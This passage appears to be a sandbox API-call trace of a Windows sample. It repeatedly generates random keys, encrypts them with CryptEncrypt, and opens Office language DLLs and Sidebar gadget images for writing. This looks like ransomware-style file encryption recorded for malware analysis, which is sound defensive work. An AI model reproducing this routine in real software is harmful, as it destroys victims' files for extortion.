(normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.450] GetProcessHeap () returned 0x2c0000 [0160.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.450] GetProcessHeap () returned 0x2c0000 [0160.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3978 | out: hHeap=0x2c0000) returned 1 [0160.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e998 | out: pbBuffer=0x57e998) returned 1 [0160.450] GetProcessHeap () returned 0x2c0000 [0160.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e990*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e990*=0x30) returned 1 [0160.450] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.451] GetProcessHeap () returned 0x2c0000 [0160.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.451] GetProcessHeap () returned 0x2c0000 [0160.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f968 | out: hHeap=0x2c0000) returned 1 [0160.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e998 | out: pbBuffer=0x57e998) returned 1 [0160.451] GetProcessHeap () returned 0x2c0000 [0160.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e990*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e990*=0x30) returned 1 [0160.451] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.451] GetProcessHeap () returned 0x2c0000 [0160.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.451] GetProcessHeap () returned 0x2c0000 [0160.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f890 | out: hHeap=0x2c0000) returned 1 [0160.451] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e990 | out: pbBuffer=0x57e990) returned 1 [0160.451] GetProcessHeap () returned 0x2c0000 [0160.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.452] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e988*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e988*=0x30) returned 1 [0160.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.452] GetProcessHeap () returned 0x2c0000 [0160.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.452] GetProcessHeap () returned 0x2c0000 [0160.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f7b8 | out: hHeap=0x2c0000) returned 1 [0160.452] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e990 | out: pbBuffer=0x57e990) returned 1 [0160.452] GetProcessHeap () returned 0x2c0000 [0160.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.452] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e988*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e988*=0x30) returned 1 [0160.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.452] GetProcessHeap () returned 0x2c0000 [0160.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.452] GetProcessHeap () returned 0x2c0000 [0160.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3898 | out: hHeap=0x2c0000) returned 1 [0160.453] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e988 | out: pbBuffer=0x57e988) returned 1 [0160.453] GetProcessHeap () returned 0x2c0000 [0160.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.453] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e980*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e980*=0x30) returned 1 [0160.453] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.453] GetProcessHeap () returned 0x2c0000 [0160.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.453] GetProcessHeap () returned 0x2c0000 [0160.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb37b8 | out: hHeap=0x2c0000) returned 1 [0160.453] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e988 | out: pbBuffer=0x57e988) returned 1 [0160.453] GetProcessHeap () returned 0x2c0000 [0160.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.453] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e980*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e980*=0x30) returned 1 [0160.453] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.453] GetProcessHeap () returned 0x2c0000 [0160.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.454] GetProcessHeap () returned 0x2c0000 [0160.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f6e0 | out: hHeap=0x2c0000) returned 1 [0160.454] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e980 | out: pbBuffer=0x57e980) returned 1 [0160.454] GetProcessHeap () returned 0x2c0000 [0160.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.454] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e978*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e978*=0x30) returned 1 [0160.454] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.454] GetProcessHeap () returned 0x2c0000 [0160.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.454] GetProcessHeap () returned 0x2c0000 [0160.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f608 | out: hHeap=0x2c0000) returned 1 [0160.454] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e980 | out: pbBuffer=0x57e980) returned 1 [0160.454] GetProcessHeap () returned 0x2c0000 [0160.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.454] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e978*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e978*=0x30) returned 1 [0160.455] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.455] GetProcessHeap () returned 0x2c0000 [0160.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.455] GetProcessHeap () returned 0x2c0000 [0160.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f530 | out: hHeap=0x2c0000) returned 1 [0160.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e978 | out: pbBuffer=0x57e978) returned 1 [0160.455] GetProcessHeap () returned 0x2c0000 [0160.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.455] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e970*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e970*=0x30) returned 1 [0160.455] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.455] GetProcessHeap () returned 0x2c0000 [0160.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.455] GetProcessHeap () returned 0x2c0000 [0160.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb36d8 | out: hHeap=0x2c0000) returned 1 [0160.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e978 | out: pbBuffer=0x57e978) returned 1 [0160.455] GetProcessHeap () returned 0x2c0000 [0160.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.456] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e970*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e970*=0x30) returned 1 [0160.456] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.456] GetProcessHeap () returned 0x2c0000 [0160.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.456] GetProcessHeap () returned 0x2c0000 [0160.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f458 | out: hHeap=0x2c0000) returned 1 [0160.456] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e970 | out: pbBuffer=0x57e970) returned 1 [0160.456] GetProcessHeap () returned 0x2c0000 [0160.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.456] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e968*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e968*=0x30) returned 1 [0160.456] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.456] GetProcessHeap () returned 0x2c0000 [0160.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.456] GetProcessHeap () returned 0x2c0000 [0160.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb35f8 | out: hHeap=0x2c0000) returned 1 [0160.457] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e970 | out: pbBuffer=0x57e970) returned 1 [0160.457] GetProcessHeap () returned 0x2c0000 [0160.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.457] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e968*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e968*=0x30) returned 1 [0160.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.457] GetProcessHeap () returned 0x2c0000 [0160.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.457] GetProcessHeap () returned 0x2c0000 [0160.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7f380 | out: hHeap=0x2c0000) returned 1 [0160.457] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e968 | out: pbBuffer=0x57e968) returned 1 [0160.457] GetProcessHeap () returned 0x2c0000 [0160.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.457] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e960*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e960*=0x30) returned 1 [0160.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.457] GetProcessHeap () returned 0x2c0000 [0160.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.458] GetProcessHeap () returned 0x2c0000 [0160.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3518 | out: hHeap=0x2c0000) returned 1 [0160.458] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e968 | out: pbBuffer=0x57e968) returned 1 [0160.458] GetProcessHeap () returned 0x2c0000 [0160.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.458] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e960*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e960*=0x30) returned 1 [0160.458] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.458] GetProcessHeap () returned 0x2c0000 [0160.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.458] GetProcessHeap () returned 0x2c0000 [0160.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3438 | out: hHeap=0x2c0000) returned 1 [0160.458] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e960 | out: pbBuffer=0x57e960) returned 1 [0160.458] GetProcessHeap () returned 0x2c0000 [0160.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.458] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e958*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e958*=0x30) returned 1 [0160.458] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.501] GetProcessHeap () returned 0x2c0000 [0160.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.501] GetProcessHeap () returned 0x2c0000 [0160.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3358 | out: hHeap=0x2c0000) returned 1 [0160.501] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e960 | out: pbBuffer=0x57e960) returned 1 [0160.501] GetProcessHeap () returned 0x2c0000 [0160.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.501] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e958*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e958*=0x30) returned 1 [0160.501] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_thunderstorm.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_thunderstorm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.609] GetProcessHeap () returned 0x2c0000 [0160.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.609] GetProcessHeap () returned 0x2c0000 [0160.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f401a8 | out: hHeap=0x2c0000) returned 1 [0160.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e958 | out: pbBuffer=0x57e958) returned 1 [0160.610] GetProcessHeap () returned 0x2c0000 [0160.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e950*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e950*=0x30) returned 1 [0160.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.653] GetProcessHeap () returned 0x2c0000 [0160.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.653] GetProcessHeap () returned 0x2c0000 [0160.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f49790 | out: hHeap=0x2c0000) returned 1 [0160.653] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e958 | out: pbBuffer=0x57e958) returned 1 [0160.653] GetProcessHeap () returned 0x2c0000 [0160.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.653] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e950*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e950*=0x30) returned 1 [0160.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.669] GetProcessHeap () returned 0x2c0000 [0160.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.669] GetProcessHeap () returned 0x2c0000 [0160.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3f258 | out: hHeap=0x2c0000) returned 1 [0160.669] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e950 | out: pbBuffer=0x57e950) returned 1 [0160.669] GetProcessHeap () returned 0x2c0000 [0160.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.669] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e948*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e948*=0x30) returned 1 [0160.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_blue_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_blue_windy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.685] GetProcessHeap () returned 0x2c0000 [0160.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.686] GetProcessHeap () returned 0x2c0000 [0160.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41fb8 | out: hHeap=0x2c0000) returned 1 [0160.686] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e950 | out: pbBuffer=0x57e950) returned 1 [0160.686] GetProcessHeap () returned 0x2c0000 [0160.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.686] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e948*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e948*=0x30) returned 1 [0160.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-waning-crescent_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.702] GetProcessHeap () returned 0x2c0000 [0160.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.702] GetProcessHeap () returned 0x2c0000 [0160.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3359a0 | out: hHeap=0x2c0000) returned 1 [0160.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e948 | out: pbBuffer=0x57e948) returned 1 [0160.702] GetProcessHeap () returned 0x2c0000 [0160.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0160.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57e940*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57e940*=0x30) returned 1 [0160.702] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.711] GetProcessHeap () returned 0x2c0000 [0160.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0160.711] GetProcessHeap () returned 0x2c0000 [0160.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3b588 | out: hHeap=0x2c0000) 